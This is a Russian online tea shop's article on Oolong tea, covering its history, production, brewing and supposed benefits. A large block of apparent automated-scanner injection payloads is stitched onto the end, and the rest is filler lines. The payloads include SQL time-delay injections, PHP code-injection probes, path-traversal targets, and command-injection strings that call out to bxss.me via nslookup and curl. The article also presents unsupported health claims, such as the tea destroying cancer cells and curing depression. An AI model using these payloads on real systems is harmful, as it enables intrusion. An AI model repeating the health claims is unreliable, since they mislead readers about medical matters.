Улун – «самый китайский чай». Другое его название - «бирюзовый» чай. Он занимает промежуточное состояние между зеленым и черным чаем. Черный чай китайцы называют красным. Отличительной особенностью производства чая сорта Улун является ферментирование, т.е. искусственное состаривание чайного листа, но не всего листа, а только части его края и поверхности. Из-за частичного ферментирования листа напиток и приобретает особенный аромат и насыщенный вкус, который не перепутаешь с другим чаем. В зависимости от сорта, в нем могут быть ярко выражены фруктовые, медовые, цветочные, карамельные и сливочные нотки. Причем нужно заметить, что все эти вкусовые оттенки имеют натуральное, естественное происхождение. Улун со вкусом и ароматом сливок, молока – это Молочный Улун. Улун с ароматом фруктов, сирени, орхидеи, меда - это Те Гуань Инь. Настоящий Улун, такой, как в нашем магазине не подвергается синтетической ароматизации.
Впервые этот чай был обнаружен в провинции Фуцзянь в уезде Аньси. В истории происхождения этого напитка имеет место несколько версий. Сорт так назван по имени нашедшего его человека - Сулун (Улун). Есть предположение, что чай впервые обнаружил охотник с темной кожей - «Темный дракон» (Улун), который из-за азартного увлечения охотой, забыл о собранных листьях и чайные листочки за это время окислились, то есть подверглись ферментации, а при заваривании приобрели особенный вкус и аромат. По третьей версии, взятой из исторической хроники «Хуа Ян Го», этот чай, как лучший китайский чай, монахи одного из монастырей использовали в качестве «подношения императору».
История Улуна насчитывает уже больше 300 лет. Люди с удовольствием пьют его и сегодня, а как он появился - это уже не совсем важно.
Производится Улун только из зрелых листьев, собранных со взрослых кустов. Чай цельнолистовой, и когда его завариваешь, можно видеть, как листочки постепенно разворачиваются.

В чае Улун ученые насчитали более 400 полезных веществ, витаминов и минералов, необходимых нашему организму. Он рекордсмен по содержанию антиоксидантов, борется с атеросклерозом, выводит холестерин, предупреждает инфаркт и инсульт, замедляет рост раковых клеток и, как говорят ученые, даже разрушает их. Этот чай, улучшая обмен веществ, помогает желающим похудеть. Доказано, что выпивая перед едой чашку чая, можно избавиться от 10% калорий. Так же и после трапезы калории будут расходоваться значительно активнее. Кроме того, чай улучшает работу нервной системы и избавляет человека от депрессии.
Заваривать Улун лучше всего в специальном глиняном чайнике проливным методом: заливаем чай почти кипятком – температура воды 85-90 градусов, и сразу сливаем воду, а потом, снова залив горячей водой, выдерживаем еще 2-3 минуты. Заварку можно использовать от 5 до 7 раз – вкус и польза чая сохраняется. Поскольку чай состоит из цельных листьев, то нужно учитывать, что заварившийся Улун значительно увеличится в объеме. Поэтому рекомендуем вам взять на чашку чуть меньше чайной ложки чая. Чай улун - это чай-тоник, подходит для неспешного, вдумчивого чаепития.
Наш магазин элитных чаев tea-dolina.ru может предложить вам самые разные Улуны. Если вы впервые хотите попробовать этот чудесный напиток, то рекомендуем вам приобрести небольшое количество разных сортов.
Улун - это самый вкусный из всех китайских чаев. Самое главное что о нем нужно знать - это как его правильно заваривать. К каждому улуну есть свой метод заварки. Если все правильно заварить, то он раскроет свой вкус и аромат так, что все другие чаи покажутся неинтересными.
1
response.write(9554043*9632317)
'+response.write(9554043*9632317)+'
"+response.write(9554043*9632317)+"
1
1
1
1
1
1
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs.jpg
Http://bxss.me/t/fit.txt
http://bxss.me/t/fit.txt?.jpg
/etc/shells
c:/windows/win.ini
bxss.me
1
1
1
1
1
1
1
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
expr 9000623074 - 948947
';print(md5(31337));$a='
";print(md5(31337));$a="
${@print(md5(31337))}
${@print(md5(31337))}
'.print(md5(31337)).'
'{${print(md5(31337))}}'
print(md5(31337));//
&nslookup -q=cname hitcovtalffpo93608.bxss.me&'"`0&nslookup -q=cname hitcovtalffpo93608.bxss.me&`'
{php}print(md5(31337));{/php}
[php]print(md5(31337));[/php]
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
|(nslookup${IFS}-q${IFS}cname${IFS}hitzyrlvovrqfb4ecb.bxss.me||curl${IFS}hitzyrlvovrqfb4ecb.bxss.me)
&(nslookup${IFS}-q${IFS}cname${IFS}hitbeofnsspcu32966.bxss.me||curl${IFS}hitbeofnsspcu32966.bxss.me)&'"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitbeofnsspcu32966.bxss.me||curl${IFS}hitbeofnsspcu32966.bxss.me)&`'
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1zzp5sbWp
1
-1 OR 2+663-663-1=0+0+0+1 --
-1 OR 2+260-260-1=0+0+0+1
-1' OR 2+629-629-1=0+0+0+1 --
-1' OR 2+941-941-1=0+0+0+1 or 'SAu6TpTg'='
-1" OR 2+333-333-1=0+0+0+1 --
1*if(now()=sysdate(),sleep(15),0)
10'XOR(1*if(now()=sysdate(),sleep(15),0))XOR'Z
10"XOR(1*if(now()=sysdate(),sleep(15),0))XOR"Z
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
1-1; waitfor delay '0:0:15' --
1-1); waitfor delay '0:0:15' --
1-1 waitfor delay '0:0:15' --
1k0PWnHz2'; waitfor delay '0:0:15' --
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
1
1'"
1
@@O22Yf
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1
1